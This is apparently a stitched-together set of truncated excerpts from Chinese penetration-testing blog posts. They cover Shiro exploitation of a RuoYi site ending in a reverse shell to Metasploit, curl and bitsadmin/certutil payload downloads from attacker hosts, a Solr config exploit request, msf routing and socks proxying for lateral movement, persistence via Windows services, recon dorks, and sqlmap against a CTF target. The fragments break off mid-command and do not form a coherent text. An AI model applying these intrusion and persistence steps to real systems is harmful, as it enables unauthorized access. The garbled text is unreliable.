docker 搭建 安装必要的系统工具 12sudo apt updatesudo apt -y install apt-transport-https ca-certificates curl software-properties-common 添加docker PGP key 1curl -fsSL https://download.docker.com/linux/debian/gpg

简介由于在横向移动或者权限维持的过程中，有可能出现，需要使用windows 服务进行执行程序，然后由于windows 服务的机制，可能在运行的时候会出现断开连接的情况，这个时候我们就需要使用工具注册成服务的形式 exe现在展示一下无服务的形式 首先生成一个普通的Exe payload 开启一个msf 监听 使用sc 模拟上线 由于不是服务所以直接被关闭了 msf-服务现在尝试使用msf

信息收集 cms 发现是若依 web 渗透 根据信息收集获取的数据，直接使用shiro 尝试 利群利用 发现存在直接反弹shell 上线msf 生成payload 开启http服务 使用curl 1curl http://ip:8000/file -O 执行 上线成功 内网信息收集 网段信息收集 fscan 一下 内网横向移动 搭建代理 成功 17

信息收集做了一个简单的信息收集 8.2 的版本，并且可以创建core ，不能修改debug 模式 web 渗透 默默打开了佩奇文档 前面几个都失败了 直接利用这个 123456789101112131415POST /solr/test/config HTTP/1.1Host: { "update-queryresponsewriter": { &

https://www.zhixi.com/view/5ca77153

代理socks分类反向代理代理服务器理解： 典型例子nginx 用于实现网站的负载均衡，安全防护音隐藏服务器的ip正向代理代理客户端理解： 可以参考clash 并不能代理google，而是通过代理自己从而访问google工具msf核心操作： 写路由，通过获取到的meterpreter 进行run autoroute -s ip段，类似于手动添加路由表 使用socks_proxy 模

简介这个只是为了深刻记录代理原理，所以尝试再做一次。 并且全程只使用msf 的代理 重点就是，多个路由，一个代理通过这一个代理，就可以访问多层内网，但是必须在对应的metepreter 设置路由，可以直接为路由表，然后进行转发 信息收集 ip 查询 端口扫描 网站信息收集 访问 路径 找到一个flag? 查看版本 存在nginx web渗透 利用thinkphp 1/index

mindmap 信息收集域名子域名收集工具oneforallpython oneforall.py –target ip/域名 runhack语法常用的语法 站点： site inurl 可以用于web 目录 intext 在正文中查询 intitle 在标题中查找 filetype 过滤文件类型 pdf,word,xls,ppt,image,jepg 网络空间搜索

文件下载windwosrundll32.exe 加载hta文件cscript.exe 加载vbs文件 bitsadmins缺点只能下载真正的http服务优点windwos自带的指令bitsadmin /transfer task_name http://ip:port/file filepathcertutil缺点需要进行两个操作，首先是下载，然后是清楚缓存指令下载:certuti

web文章管理系统这个是一个sql注入 0x00 使用的知识点 sql 注入 0x01 出现id 0x02 爆破数据库 1python sqlmap.py -u http://challenge.qsnctf.com:32112?id=1 --dbs 发现ctftraining 1python sqlmap.py -u http://challenge.qsnctf.com:321